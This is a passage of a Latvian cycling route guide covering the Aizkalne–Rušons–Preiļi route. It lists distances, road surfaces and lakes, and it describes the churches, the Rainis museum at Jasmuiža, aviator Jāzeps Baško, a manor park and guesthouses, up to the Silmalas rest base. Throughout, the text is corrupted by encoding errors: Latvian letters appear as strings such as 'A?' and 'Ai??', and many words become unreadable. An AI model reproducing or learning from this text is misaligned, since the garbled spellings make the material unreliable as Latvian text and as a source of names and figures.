Aizkalne – RuA?ons – PreiA?i | Dēkaiņi

Aizkalne – RuA?ons – PreiA?i


Aizkalne – RuA?ons – PreiA?i Print This Post

DabA? marA?rutam ir dzeltens marAi??Ai??jums

PiedA?vA?to velomarA?rutu aktAi??vi velobraucAi??ji var veikt vienas dienas laikA?. NesteidzAi??gA?ki braucAi??ji to var sadalAi??t divu dienu braucienA?, pA?rnakA?Ai??ojot atpAi??tas bA?zAi?? ai???Silmalasai???. Ai??is marA?ruts ir savienojams ar daA?A?du variantu 4. un 5. marA?rutu. Ja aktAi??vi velobraucAi??ji ir ieplA?nojuA?i divu dienu ceA?ojumu, tad iesakA?m A?o marA?rutu apvienot ar 4. marA?ruta 1. variantu. Ai??ajA? gadAi??jumA? jAi??s pilnAi??bA? izbaudAi??siet Latgales dabas daudzveidAi??bu un kultAi??rvAi??sturisko mantojumu.

MarA?rutA? jAi??s iepazAi??siet 8 ezerus, tai skaitA? astoto lielA?ko Latvijas ezeru – RuA?onu, 4 pilskalnus, 4 dievnamus, divu ievAi??rojamu Latvijas karavadoAi??u piemiAi??as vietas, RaiAi??a jaunu dienu zemi un daudzus citus interesantus objektus un vietas.

Aizkalne-KastAi??re- 7,6 km

KastAi??re-Gelenova-Ai??aures- 6,0 km

Ai??aures-RuA?ona-SAi??veriAi??a- 8,4 km

SAi??veriAi??a-RuA?enAi??cas pilskalns-RuA?enAi??ca-KrupeniA?ki-OndzuA?i-11,7 km

OndzuA?i-Kategrade-SedeA?i-StupA?ni-Ludvigova-9,1 km

Ludvigova-KankuA?i-Lietavnieki-PreiA?i-8,7 km

KOPAi??-51,5km

MarA?rutA? asfalta segums ir 5,8 km ceA?a, grants segums 19,1 km, uzlabots zemesceA?A? 14,3 km un zemesceA?A? 12.3 km. Reljefs pA?rsvarA? lAi??dzens. VairA?k kA?pumu un nobraucienu ir marA?ruta posmA? no OndzuA?iem lAi??dz PreiA?iem. LietainA? laikA? vai pAi??c lietavA?m zemes ceA?i, pateicoties Latgales mA?lam, vietA?m var bAi??t dubA?aini un slideni. SavukA?rt sausA? laikA? uz grantAi??tajiem lielceA?iem veidojas ai??ztrepeai??? – seviA?Ai??i posmA? Ai??aures-RuA?ona. IepirkA?anA?s jA?plA?no AizkalnAi?? vai KastAi??rAi??. SabiedriskA?s Ai??dinA?A?anas pakalpojumu sniedzAi??ju A?ajA? marA?rutA? nav. Ieteicams nodroA?inA?ties ar nepiecieA?amA?kajA?m velosipAi??du rezerves daA?A?m, jo marA?rutA? tA?s iegA?dA?ties nebAi??s iespAi??jams.

LabA?kA?s peldvietas ir pie viesu mA?jA?m. BicA?nu ezera krastA? tA?das ir divas – ai???Ai??deneai??? Ai??un ai???Ai??auresai???, RuA?ona ezera krastA? – RuA?onas muiA?a un atpAi??tas komplekss ai???Silmalasai???. Te ir ierAi??kotas nelielas Ai??rtas peldvietas. Pelde pirms tam jA?saskaAi??o ar Ai??paA?niekiem.

 

MarA?rutu sA?kam pie Aizkalnes Romas katoA?u baznAi??cas. VietA?, kur atrodas tagadAi??jA? baznAi??ca, 1710. gadA? tika uzcelta pirmA? koka baznAi??ca, kura dAi??vAi??ta par Ai??rAi??dera muiA?as kapelu, jo muiA?a piederAi??ja Ai??rAi??deram. 1782. gadA? kA? JasmuiA?as Ai??paA?nieks minAi??ts Osips Ai??adurskis. 1815. gadA? ap A?o baznAi??cu muiA?kungs Ksaverijs Ai??adurskis uzcAi??la jaunu dievnamu, veltAi??tu SvAi??tA? Krusta paaugstinA?A?anas godam. Tas bija taisnstAi??rveida 24 metrus garA?, 12 metrus plats nams. Uz pAi??lA?riem pie gala durvAi??m balstAi??jA?s lievenis, zem kura uz sienas bija uzgleznoti SvAi??tA? PAi??tera un SvAi??tA? PA?vila attAi??li. BaznAi??ca bija bez torAi??a. TA?da tA? pastA?vAi??ja lAi??dz 1926. gadam, kad prA?vesta Ostrovska darbAi??bas laikA? baznAi??cu nojauca, atstA?jot tikai mAi??rus, un sA?ka pA?rbAi??vi. Lai piebAi??vAi??tu kapelas, tika izlauztas sA?nu sienas 9 metru platumA?, vAi??lA?k katrA? sA?nA? izbAi??vAi??jot 9 metrus platu un 3 metrus garu kapelu. No priekA?puses dievnams tika pagarinA?ts par 6 metriem, virs pagarinA?juma uzliekot nelielu tornAi??ti. No iepriekA?Ai??jA?s baznAi??cas iekA?Ai??jA? iekA?rtojuma paturAi??ja tikai lielo altA?ri, divus biktskrAi??slus, skulptAi??ru un gleznu ar SvAi??tA? Jura attAi??lojumu, pA?rAi??jo inventA?ru iegA?dA?jA?s no jauna. ApkA?rt baznAi??cas dA?rzam ir laukakmeAi??u mAi??ra A?ogs un Ai??ieA?eA?u laukakmeAi??u vA?rti. BaznAi??cas priekA?A? ir piemiAi??as akmens politiski represAi??tajiem aizkalnieA?iem.

Iepretim baznAi??cai, ceA?u krustojumA?, kreisajA? pusAi??, ir apskatA?ms vietAi??jA?s nozAi??mes arhitektAi??ras piemineklis – Aizkalnes krogs, kas, protams, nedarbojas, tomAi??r apstiprina sen zinA?mo klasisko patiesAi??bu – pretAi?? baznAi??cai – krogs!

TA?lA?k dodamies uz blakus esoA?o Aizkalnes pareizticAi??go baznAi??cu. Lai arAi?? Aizkalnes pagasts pAi??c kultAi??ras un valodas ir latvisks, tomAi??r par krievu tirgotA?ja Grigorija KuzAi??ecova, kurA? JasmuiA?u no Viktora Ai??adurska bija nopircis ap 1880. gadu, krievu valdAi??bas, un G. KuzAi??ecovaAi?? dAi??la Ai??ikitas lAi??dzekA?iem 1904. gadA? tika uzcelta Aizkalnes pareizticAi??go baznAi??ca. PareizticAi??go te bija pavisam maz. 1938. gadA? draudzAi?? bija 142 pareizticAi??gie, kas dzAi??voja tuvA?kA? un tA?lA?kA? apkaimAi??, pat lAi??dz 20 km tA?lu. BaznAi??ca izceA?as ar savu Ai??patnAi??jo Bizantijas stilu. BaznAi??cA? atrodas daudz vAi??rtAi??gu gleznu, altA?ris, gobelAi??ni un grA?matas, kA? arAi?? reliA?iskajA?s ceremonijA?s lietojamie priekA?meti, kuriem piemAi??t liela mA?kslas un kultAi??rvAi??sturiskA? vAi??rtAi??ba. LielA?kA? daA?a A?o priekA?metu ir 17.-18. gs. SanktpAi??terburgA? darinA?ti mA?kslas darbi.

TA?lA?k dodamies uz RaiAi??a muzeju ai???JasmuiA?uai???. Pa ceA?am ir apskatA?ma bijuA?A?Ai??Aizkalnes skola, kultAi??ras nams un pagasta pA?rvaldes Ai??ka. Interesanti, ka pagasta pA?rvaldes Ai??ka, kultAi??ras nams un vAi??l daA?as Ai??kas ir uzbAi??vAi??tas uz Aizkalnes senkapiem.

Aizkalnes ievAi??rojamA?kais un pazAi??stamA?kais apskates objekts ir RaiAi??a muzejs ai???JasmuiA?aai???, kas izvietojies bijuA?ajA? JasmuiA?as muiA?A?. Kad RaiAi??a tAi??vs KriA?jA?nis PliekA?A?ns 1883. gadA? sA?ka saimniekot JasmuiA?A?, tA? atradA?s Vitebskas guberAi??as Daugavpils apriAi??Ai??Ai??, un muiA?as Ai??paA?nieks bija Dinaburgas 2. A?ildes tirgotA?js Grigorijs KuzAi??ecovs, no kura to nomA?ja K. PliekA?A?ns. PliekA?A?nu A?imene JasmuiA?A? nodzAi??voja lAi??dz 1891. gadam. KuzAi??ecovu dzimta JasmuiA?A? saimniekoja lAi??dz 1949. gadam.

No 1949. lAi??dz 1960. gadam JasmuiA?A? bija kolhoza “Rainis” kantoris, darbinieku dzAi??vokA?i, Aizkalnes ciema padome, muiA?as kAi??tAi??s atradA?s kolhoza zirgi un govis.
1964. gadA? JasmuiA?A? nodibinA?ts sabiedriskais muzejs, bet 1966. gadA? tas kA?uva par RaiAi??a LiteratAi??ras un mA?kslas vAi??stures muzeja (no 2001. gada ai??i?? VA RakstniecAi??bas, teA?tra un mAi??zikas muzeja) filiA?li.
JasmuiA?A? topoA?ais dzejnieks Rainis pavadAi??ja savas A?imnA?zista un studenta brAi??vdienas. Ai??ajA? posmA? Rainis ne tikai daudz lasAi??ja pasaules klasiAi??u darbus, bet arAi?? nopietnA?k pievAi??rsA?s dzejai, dramaturA?ijai, tulkoA?anai, rakstAi??ja dienasgrA?matu, kurA? atspoguA?ojas JA?Ai??a PliekA?A?na tA? brAi??A?a pretrunAi??gA?s izjAi??tas, sevis meklAi??jumi, kA? arAi?? PliekA?A?nu ikdiena un sadzAi??ve JasmuiA?as muiA?A?.

RekonstruAi??tajA? bijuA?ajA? muiA?as pA?rvaldnieka dzAi??vojamajA? mA?jA? ierAi??kota ekspozAi??cija “RaiAi??a A?imnA?zijas un studiju gadi”. MuzejA? skatA?ma plaA?a Latgales keramikas ekspozAi??cija.
1974. gadA? no SilajA?Ai??u Ai??embeA?iem uz JasmuiA?u pA?rvesta un 1999. gadA? rekonstruAi??ta Latgales keramikas vecmeistara Andreja PaulA?na darbnAi??ca un ceplis, kur var iepazAi??t vidi un apstA?kA?us, kA?dos novada podnieki strA?dA?juA?i XIX gadsimta beigA?s un XX gadsimtA?. Te (noteiktos datumos) tiek demonstrAi??ts keramikas apdedzinA?A?anas process malkas ceplAi??.

JasmuiA?A? var baudAi??t Latgales novada krA?A?Ai??o dabu, pastaigA?joties pa seno muiA?as parku JaA?as upAi??tes krastos. Muzeja teritorijA? atrodas brAi??vdabas estrA?de, kur vasarA? notiek daA?A?di pasA?kumi: teA?tra izrA?des, koncerti, zaA?umballes.

PAi??c muzeja apmeklAi??juma dodamies pa ceA?u pA?ri JaA?as upAi??tei un nogrieA?amies pa kreisi. PAi??c 860 m, aiz bijuA?ajA?m darbnAi??cA?m, ceA?a kreisajA? pusAi??, ir lauku sAi??ta. Iepretim A?ai mA?jai ir vieta, kur bija uzstA?dAi??ta plA?ksne ar uzrakstu ai???Rainisai???. Par sava pseidonAi??ma – Rainis – vAi??sturi dzejnieks ap 1920.gadu savam biogrA?fam un kopoto rakstu sastA?dAi??tA?jam A. Birkertam pastA?stAi??jis sekojoA?o: ai???Mans pseidonAi??ms man atrasts gadus 25 atpakaA?. Man A?oti patika senlatvieA?u vA?rdi, latgalieA?os, kur es dzAi??voju jaunAi??bA?, es daudz tA?du dzirdAi??ju, no visiem man visvairA?k iepatikA?s A?is, kuru es lasAi??ju vienA? Latgales pagastA? uz ceA?a stabiAi??a, ar kA?diem mAi??dz apzAi??mAi??t zemniekiem taisA?mos lielceA?a gabalus. TA?tad redzat, ka mans vA?rds no lielceA?a uzlasAi??ts paA?A? neskartA?kajA? LatvijA?, un kas viAi??u nes tam arAi?? pa lielceA?iem jA?staigA?. Es to vA?rdu pieAi??Ai??mu, kad man bija jA?paraksta pirmA?s drukA?tA?s rindiAi??as un tA? man viAi??A? palicisai???.

Zemnieks Andrejs Rainis, kura uzvA?rdu JA?nis PliekA?A?ns izvAi??lAi??jA?s par savu paliekoA?o pseidonAi??mu, dzAi??voja JasmuiA?as pagasta ZeiliAi??os (tagad RuA?onas pag.), un viAi??am bija jA?labo lielceA?a JasmuiA?a-KastAi??re 0,5 lAi??dz 0,6 km garA? ceA?a posms, kas sA?kA?s pie A?Ai??m mA?jA?m un stiepA?s KastAi??res virzienA?.

Turpinot marA?rutu, pAi??c 670 m nonA?kam pie trAi??s ceA?u krustojuma. Pa labi ceA?A? ved uz KastAi??ri, pa kreisi uz Otrajiem VucA?niem, bet taisni uz Ai??Ai??epstiem – mums jA?dodas KastAi??res virzienA?. PAi??c 4,33 km esam nonA?kuA?i pie PreiA?i – Aglona A?osejas. Aiz A?osejas jau sA?kas KastAi??res ciems. Dodamies taisni cauri ciematam un pAi??c 620 m nonA?kam pie stenda, kas veltAi??ts JA?zepam BaA?ko. Pirms tam, ja ir interese, aiz A?osejas pirmajA? ielA? (Upes iela) pa kreisi var doties apskatAi??t KastAi??res Soda kalnu, kas ir vietAi??jas nozAi??mes arheoloA?ijas piemineklis un sena nepaklausAi??go A?auA?u sodAi??A?anas vieta. Soda kalns atrodas 330 m no KastAi??res galvenA?s (Liepu) ielas pie tiltaAi?? kreisajA? pusAi??,Ai?? JaA?as upes labajA? krastA?. Vieta gan ir apaugusi ar kokiem un blakus ir privA?tA? apbAi??ve. KastAi??rAi?? vAi??l ir apskatA?ma KastAi??res muiA?as saimniecAi??bas Ai??ka. Ai??ajA? arhitektAi??ras piemineklAi?? padomju laikos ir veikta pA?rbAi??ve – piebAi??vAi??ts neizteiksmAi??gs otrais stA?vs, kas faktiski A?o pieminekli padara nevAi??rtAi??gu.

NeA?aubAi??gi KastAi??res ievAi??rojamA?kais cilvAi??ks, kas kA?dreiz dzAi??vojis KastAi??rAi??, ir JA?zeps (Jezups) BaA?ko (1889. 9. I-1946. 31. V) – militA?rais darbinieks, kara lidotA?js, aviA?cijas zinA?tnieks, A?enerA?lis, apbalvots ar Triju ZvaigA?Ai??u ordeni. ViAi??A? sarakstAi??jis pirmA?s grA?matas par aviA?ciju latvieA?u valodA?.

JA?zeps (Jezups) BaA?ko dzimis 1889. gada 9. janvA?rAi?? Daugavpils apriAi??Ai??a JasmuiA?as pagasta (tagad RuA?onas) KastAi??rAi?? zemnieku daudzbAi??rnu A?imenAi??. JA?zeps bija jaunA?kais no bAi??rniem. SpAi??tAi??jot nabadzAi??bai, vecA?ki A?A?va JA?zepam apmeklAi??t skolu ai??i?? sA?kumA? JasmuiA?as pamatskolu, pAi??c tam arAi?? PreiA?u divgadAi??gA?s skolas pilnu kursu. 1908.gadA? JA?zeps beidza Belostokas reA?lskolu ar izcilAi??bu, neskatoties uz smagajiem dzAi??ves apstA?kA?iem. TA?lA?k viAi??A? izglAi??tojA?s PAi??terburgas karaskolA?, Virsnieku gaisa kuA?niecAi??bas skolA? un GatA?inas aviA?cijas skolA?.

PirmA? pasaules kara laikA? JA?zeps BaA?ko bija pasaulAi?? lielA?kA? bumbvedAi??ja ai???IA?ja Muromietisai??? komandieris un eskadras nodaA?as priekA?nieks. Ar ai???IA?ju Muromietiai??? veicis 114 kaujas lidojumus, tas ir, viens pats apmAi??ram treA?daA?u no visa Krievijas bumbvedAi??ju kaujas lidojumu skaita PirmA? pasaules kara laikA?. Ar lidmaA?Ai??nu ai???IA?ja Muromietisai??? viAi??A? sasniedza 4 pasaules aviA?cijas rekordus. JA?zeps BaA?ko tika apbalvots ar visiem tA? laika Krievijas ordeAi??iem ai??i?? 4 Jura krustiem, Jura ordeni, Jura ieroci, 2 Vladimira, 2 StaAi??islava, 3 Annas ordeAi??iem. KopumA? J.BaA?ko tika atzAi??ts par izcilA?ko bombardAi??tA?ju pasaulAi?? un par vienu no izcilA?kajiem pasaules lidotA?jiem vispA?r ai??i?? ne velti viAi??a vA?rds ierakstAi??ts Luija Blerio Zelta grA?matA? (ParAi??zAi??), t.i., pasaules labA?ko lidotA?ju Zelta grA?matA?.

1921.gadA? JA?zeps BaA?ko atgriezA?s LatvijA? un kA?uva par vienu no Latvijas aviA?cijas izveidotA?jiem. 1922. gadA? tika iecelts par aviA?cijas diviziona komandieri, vAi??lA?k par Latvijas armijas aviA?cijas priekA?nieku. 1940. gadA? paaugstinA?ts par A?enerA?li.

RaA?Ai??gs bija viAi??a darbs militA?rajA? rakstniecAi??bA?: viAi??A? ir sarakstAi??jis daudzas speciA?la rakstura grA?matas, rakstus periodiskajA? presAi?? ai??i?? ai??zLatvijas KareivAi??ai???, ai??zSpA?rnotajA? LatvijA?ai???, ai??zAizsargA?ai??? u.c. Tapa arAi?? jaunas grA?matas ai??i?? ai??zAviA?cijas taktikaai???, ai??zAviA?cijas darbAi??ba piemAi??rosai??? u.c. ViAi??A? bija arAi?? ai??zLatvieA?u konversA?cijas vA?rdnAi??casai??? lAi??dzstrA?dnieks un tai devis lielA?ko daA?u rakstu par aviA?ciju un gaisa kuA?niecAi??bu.

1940.gadA? J. BaA?ko pensionAi??jA?s un atgriezA?s dzimtajA? pusAi??, lai piepildAi??tu seno sapni par atpAi??tu dzimtajA? novadA?. 40.gados abas okupA?ciju varas mAi??A?inA?ja izmantot J. BaA?ko darbam savA? pusAi??, taA?u viAi??A? no visiem amatiem atteicA?s. JA?zeps BaA?ko mira 1946.gada 31.maijA? 57 gadu vecumA?,Ai??un apbedAi??ts dzimtajA? ciemA? EikA?a kapos. Savu mA?ju, ko viAi??a A?imene cAi??la piecpadsmit gadus, JA?zeps novAi??lAi??ja vietAi??jA?s skolas vajadzAi??bA?m.

SakarA? ar JA?zepa BaA?ko simtgadi, piedaloties Latvijas kara aviA?cijas veterA?niem, pie viAi??a mA?jas KastAi??rAi?? 1989. gada 27. maijA? atklA?ts piemiAi??as akmens.

 

 

 

 

 

 

ApskatAi??juA?i JA?zepa BaA?ko mA?ju un piemiAi??as akmeni, dodamies tA?lA?k. Nedaudz aiz skolas, ganAi??bA?, ceA?a labajA? pusAi??, ir apskatA?ms Lielais KastAi??res diA?ozols, kura apkA?rtmAi??rs sasniedz 7,3 m. Laika zobs ozolu ir krietni apskA?dAi??jis, un paA?laik tam ir dzAi??vi trAi??s lieli zari. Labs orientieris ir ceA?a labajA? malA? esoA?ais krucifikss, pie kura var atstA?t velosipAi??dus un doties apskatAi??t diA?ozolu. CeA?a pretAi??jA? pusAi??, aiz Ai??denstorAi??a, atrodas vietAi??jA?s nozAi??mes arheoloA?iskais piemineklis – KastAi??res senkapi. No marA?ruta sA?kuma esam veikuA?i 7,57 km.

 

 

 

MarA?rutu turpinA?m taisni un pAi??c 1,2 km nonA?kam pie ceA?a krustojuma pa labi. Ai??eit ir redzama lauku sAi??ta un EikA?a ezers. Braucot pa A?o ceA?u, aiz minAi??tA?s lauku sAi??tas ezera krastA? nonA?kam pie kapiem. Ai??ie ir EikA?a kapi, kur apglabA?ts slavenais latvieA?u lidotA?js, A?enerA?lis JA?zeps BaA?ko un viAi??a sieva Jevdokija.

AtgrieA?amies uz ceA?a un turpinA?m marA?rutu. ApmAi??ram pAi??c 600 m esam A?aurA?kajA? vietA?, kas atdala JaA?ezeru no EikA?a ezera. Pa labi ir EikA?a ezers, bet pa kreisi, lielA?kais – JaA?ezers.

 

 

 

JaA?ezers (JA?A?ezers) vai JaA?a ezers atrodas Latgales augstienes FeimaAi??u paugurainAi??, 149 m vjl. TA? platAi??ba kopA? ar salu sastA?da 97,8 ha. Garums Z-D virzienA? ai??i?? 1,6km, lielA?kais platums ai??i?? 0,8 km. VidAi??jais dziA?ums sasniedz 2,8 m. LielA?kais dziA?ums konstatAi??ts ezera D galA? un sasniedz 4,1 m. JaA?ezers kopA? ar blakus esoA?o BicA?nu ezeru iekA?auts dabas liegumA? ai??zJaA?as un BicA?nu ezersai???.

 

 

 

 

EikA?a ezers atrodas Latgales augstienes FeimaAi??u paugurainAi??, 151 m vjl, morAi??nieplakA?. Ezera platAi??ba sasniedz 55,4 ha, ar salu – 55,8 ha. MaksimA?lais dziA?ums – 7,8 m, vidAi??jais – 4,0 m. Ezera lielA?kais platums ir 0,8 km, garums 1,2 km. EikA?a ezers ir pirmais, kas veido vairA?ku savienotu ezeru sistAi??mu, kurA? ietilps arAi?? JaA?ezers, BicA?nu ezers, Kategrades ezers, Zolvas ezers, Sekstu ezers, RuA?ons un vAi??l vairA?ki ezeri. EikA?a ezers ir eitrofs ezers: krastmala smilA?aina, akmeAi??aina; aizaugums 15% platAi??bas.

Turpinot marA?rutu, apmAi??ram vAi??l pAi??c 2 km varam priecA?ties par nA?koA?o ezeru – A?oreiz tas ir BicA?nu ezers, kas ar JaA?ezeru ir savienots ar nelielu A?aurumu.

 

 

ArAi?? BicA?nu ezers atrodas Latgales augstienes FeimaAi??u paugurainAi??, 149 m vjl. TA? platAi??ba ir 159,0 ha kopA? ar salA?m ai??i?? 164,2 ha. Garums ZA-D virzienA? ai??i?? 3,0 km, lielA?kais platums ai??i?? 1,0 km. VidAi??jais dziA?ums sasniedz 4,1 m. LielA?kais dziA?ums konstatAi??ts ezera D galA?, apmAi??ram pa vidu starp pirmo salu, kuru mAi??s varam redzAi??t arAi?? no ceA?a, un krastu, un sasniedz 18,8 m.

VAi??l pAi??c 1,3 km nonA?kam pie informA?cijas stenda, kas informAi?? par GeA?enovas parku. No marA?ruta sA?kuma esam veikuA?i 12,0 km.

 

 

 

GeA?enovas parks ar reti sastopamA?m koku sugA?m atrodas BicA?nu ezera labajA? krastA?.Ai?? Te irAi?? saglabA?jusies arAi?? no sarkaniem Ai??ieA?eA?iem bAi??vAi??tA? muiA?as saimniecAi??bas Ai??ku apbAi??ve.

GeA?enovas parks ir dabas piemineklis, kurA? atrodas valsts aizsardzAi??bA? no 1957. gada. Tas ir ainavisks parks ar 23 eksotisku koku un krAi??mu sugA?m, platAi??ba ir 8 ha, kura ietver gan sauszemi, gan Ai??deAi??us.

Parks BicA?nu ezera pussalA? ierAi??kots 19. gs. 90. gadu beigA?s un 20. gs. sA?kumA?, piederAi??jis muiA?kungam, kurA? parku ierAi??kojis par godu savai meitai HelAi??nai. AgrA?k parks tA? arAi?? saucies – Helenovas parks. Parka teritorijA? bija muiA?as Ai??ka un tai pieguA?oA?as bAi??ves. MuiA?a bija renesanses stila atdarinA?jums. MuiA?as Ai??ku atliekas nojauktas 1990. g., parkA? palikuA?i Ai??ku pamati.

Kokaugu vietAi??jA?s un inducAi??tA?s sugas izveidojuA?as Ai??patnAi??ju meA?audzi. Parka D daA?A? ir meA?aparkam lAi??dzAi??gs stA?dAi??jums ar lielA?m lapegA?u un sarkano ozolu grupA?m. ApmAi??ram 0,3 km pirms informA?cijas stenda, ceA?a labajA? pusAi??, varAi??ja apskatAi??tAi?? interesantu lapegA?u audzi, kas arAi?? ir parka sastA?vdaA?a. ParkA? sastopami tA?di Latvijai netipiski koki kA? Veimutpriede, Holandes liepa, JapA?nas lapegle, sarkanais ozols, pelAi??kais riekstkoks, KanA?das papele, TatA?rijas kA?ava un vAi??l atseviA?Ai??i interesanti koki.

No informA?cijas stenda pAi??c 465 m kreisajA? pusAi?? atrodas viesu nams ai???Ai??deneai???(tel.+37126465998). Te ir ne tikai viesu nams, bet arAi?? kempinga mA?jiAi??as, un var vienoties par telts vietA?m. Ezera krastA? ir arAi?? neliela peldvieta. Turpinot pAi??c 0,90 km sasniedzam Ai??aures un ceA?a krustojumu ar valsts autoceA?u KastAi??re – Kategrade – Jaunaglona. No marA?ruta sA?kuma esam veikuA?i 13,57 km.

PretAi?? mums paveras Kategrades ezers, pa kreisi redzams viesu nams ai???Ai??auresai??? (tel.+37129642100), kurA? nepiecieA?amAi??bas gadAi??jumA? var sarunA?t naktsmA?jas, telA?u vietas un vienoties par peldi BicA?na vai KategradesAi?? ezerA?. ApdzAi??votA?s vietas nosaukums ir radies no A?auruma, kas atdala BicA?nu ezeru no Kategrades ezera. Abus ezerus savieno neliela upAi??te. Interesanti, kaAi?? BicA?na ezera Z lAi??cis padomju laika kartAi??s ir bijis atzAi??mAi??ts kA? atseviA?Ai??s ezers. PA?rsvarA? tas ir minAi??ts kA? TurA?inkas ezers, bet atseviA?Ai??os materiA?los tas tiek dAi??vAi??ts arAi?? par Percovkas ezeru.

 

 

 

Kategrades ezera platAi??ba sasniedz 134,4 ha. Garums Z-D virzienA? ai??i?? 2,7 km, lielA?kais platums 0,7 km. Ezera vidAi??jais dziA?ums ir 1,6 m, dziA?A?kajA? vietA? tas sasniedz 3 m dziA?umu. VasarA?s ezers D gals stipri aizaug. Ezera nelielais dziA?ums un aizaugums ir par pamatu tam, ka tas ir bagA?ts ar zivAi??m. Pie labvAi??lAi??giem apstA?kA?iem A?eit var gAi??t labus lAi??daku lomus.

MAi??su marA?ruts turpinA?s pa kreisi. Ai??is ceA?A? ir ar grants segumu. TA? kvalitA?te ir atkarAi??ga no brAi??A?a, kad jAi??s pa to braucat un kad pAi??dAi??jo reizi to ir greiderAi??jis greideris. Var gadAi??ties, ka jA?pA?rvietojas pa putekA?iem un apnicAi??gu ai???trepiai???, bet pastA?v arAi?? iespAi??ja, ka ceA?A? ir lAi??dzens un labi braucams. PAi??c 2,2 km A?Ai??Ai??rsojam SanktpAi??terburga – VarA?ava dzelzceA?a lAi??niju. KA?dreiz, kad vAi??l kursAi??ja vietAi??jie pasaA?ieru vilcieni, A?eit bija pieturas punkts ai???ApsA?niai???. VAi??l pAi??c 2,0 km sasniedzam RAi??zekne – Daugavpils A?oseju. Mums A?Ai?? A?oseja jA?A?Ai??Ai??rso un jA?dodas taisni lAi??dz baltajai RuA?onas katoA?u baznAi??cai. No marA?ruta sA?kuma esam veikuA?i 19,36 km, bet no Ai??aurAi??m 5,84 km.

PriekA?A? mums paveras aizraujoA?s skats uz RuA?onu. RuA?ons ir astotais lielA?kais Latvijas ezers un ar saviem daudzajiem lAi??A?iem un salA?m viens no Latvijas gleznainA?kajiem ezeriem. TA? platAi??ba ir 2373,0 ha, kopA? ar salA?m 2407,0 ha. LielA?kais garums sasniedz 13 km, bet platums ai??i?? 5,5 km. VidAi??jais dziA?ums ir 2,9 m, bet maksimA?lais dziA?ums sasniedz 29,9 m, un A?Ai?? vieta atrodas A?beA?u lAi??A?a galA?. Ezeram ir sareA?A?Ai??ta konfigurA?cija un gara krasta lAi??nija. R daA?a veido plaA?A?ku akavatoriju, tajA? atrodas 10 aizsargA?jamas salas. Pavisam RuA?onA? ir 34 salas. Uz A RuA?ons saA?aurinA?s un pA?riet lAi??kumainajA? A?beA?u lAi??cAi??, kurA? ir daudz gleznainu lAi??cAi??A?u un saliAi??u. To no RuA?ona pamatdaA?as noA?Ai??ir liela meA?aina pussala, tA?pAi??c A?o garo lAi??ci daA?kA?rt sauc arAi?? par A?beA?u ezeru.

KA? liecina arheoloA?iskie pieminekA?i, atradumi un rakstAi??tie vAi??stures avoti, RuA?onas novada centrs bija RuA?ona (VecruA?ona). TA? ir vieta, kur mAi??s paA?laik atrodamies. 1456. gadA? minAi??ta RuA?onas muiA?a, kura piederAi??jusi Johannesam RAi??binderam. RuA?onas novadA? ietilpa arAi?? Aglona ar apkaimi. Aglonas nosaukums vAi??stures avotos parA?dA?s tikai 18. gs.

16. gs celta pirmA? RuA?onas koka baznAi??ca, viena no vecA?kajA?m LatvijA?. Jaunu koka baznAi??cu RuA?onA? vecA?s baznAi??cas vietA? 1677. gadA? uzcAi??la jezuAi??ti ar muiA?nieku Sokolovsku-Korabu atbalstu. 1766. gadA? tA?s vietA? RuA?onas muiA?as Ai??paA?niece Ieva Selicka uzcAi??la jaunu koka baznAi??cu un klosteri, bet 1816. gadA? par Ievas Selickas lAi??dzekA?iem ir uzcelta tagadAi??jA? RuA?onas mAi??ra baznAi??ca ar klostera kompleksu. BaznAi??cA? atrodas 4 mA?kslas pieminekA?i, bet tA?s pagrabos savulaik apglabA?ti mAi??ki.

RuA?onas novads senatnAi?? ir bijis ne vien ievAi??rojams latgaA?u administratAi??vais un ekonomiskais, bet arAi?? garAi??gais centrs Te ir daudz vietu, ko sauc par svAi??tvietA?m, kulta vai upuru vietA?m. No A?ejienes RuA?onA? ir redzama LielA? (Upursala) sala ar tajA? esoA?o Upurakmeni. VistuvA?k krastam atrodas Liepu sala, kurA? ir arheoloA?ijas piemineklis ai??i?? apmetne. Tepat netA?lu ir KurtoA?a pilskalns un KristapiAi??u senkapi. Tas viss liecina par A?Ai??s vietas seno uzplaukumu. VAi??sturiskajA? literatAi??rA? rakstAi??ts, ka RuA?ona, caur kuru gA?jis starptautiskais tirdzniecAi??bas ceA?A?, kA? apdzAi??vota vieta izaugusi tik liela, ka tai bijuA?as pat miesta tiesAi??bas.

MarA?rutu turpinA?m pa kreisi. LabajA? pusAi?? starp ceA?u un RuA?onu redzam vAi??rienAi??gus labiekA?rtoA?anas un atjaunoA?anas darbus, kas tuvojas noslAi??gumam. Ai??eit privA?tAi??paA?nieks atjauno RuA?onas (VecruA?onas) muiA?as Ai??ku un apkA?rtni. Ai??eit piedA?vA? arAi?? naktsmAi??tnes Ai??-gan zem jumta, gan telA?u vietas (tel.+37127533033)

RuA?onas katoA?u baznAi??cu ar RuA?onas muiA?u savieno 218 m gara liepu aleja, caur kuru mAi??s braucam un kas laika gaitA? ir cietusi.Ai?? RuA?onas muiA?as pils ir celta 1903. gadA?. TA? ir vienstA?va mAi??ra Ai??ka ar divu stA?vu centrA?lo daA?u. RuA?onas muiA?as pils ir celta neorenesanses arhitektAi??ras stilA?, un to iekA?auj skaists parks, kurA? gan gadu gaitA? ir stipri nolaists. JA?cer, ka jaunie Ai??paA?nieki parku sakops. MuiA?as teritorijas apskate ir jA?saskaAi??o ar Ai??paA?niekiem.

 

PAi??c aptuveni 1,3 km kreisajA? pusAi?? ir redzamas mA?jas. Aiz A?Ai??m mA?jA?m var pamanAi??t Lielo KurtoA?a ezeru. Tepat ir arAi?? KurtoA?a pilskalns. Pilskalnu jau no senA?m dienA?m apstrA?dA?, tA?pAi??c tas daA?Ai??ji zaudAi??jis savu kultAi??rvAi??sturisko nozAi??mi. ArAi?? vizuA?li to grAi??ti atA?Ai??irt no kopAi??jA?s ainavas. VAi??l pAi??c 2,5 km nonA?kam atpAi??tas bA?zAi?? ai???Silmalasai??? (tel.+37129101378). Ja esam devuA?ies divu dienu braucienA?, tad A?eit ir jA?nakA?Ai??o. Te var pilnAi??bA? izbaudAi??t RuA?ona burvAi??bu un gAi??t daudz pozitAi??vu emociju. NakA?Ai??oA?anas iespAi??jas ir gan kempinga mA?jiAi??A?s, gan teltAi??s. Saimniekiem var pasAi??tAi??t arAi?? pirti un maltAi??ti. No A?ejienes var uzsA?kt arAi?? mAi??su piedA?vA?to marA?rutu Nr. 2 – ApkA?rt RuA?onam. No marA?ruta sA?kuma esam veikuA?i 21,92 km.

 

 

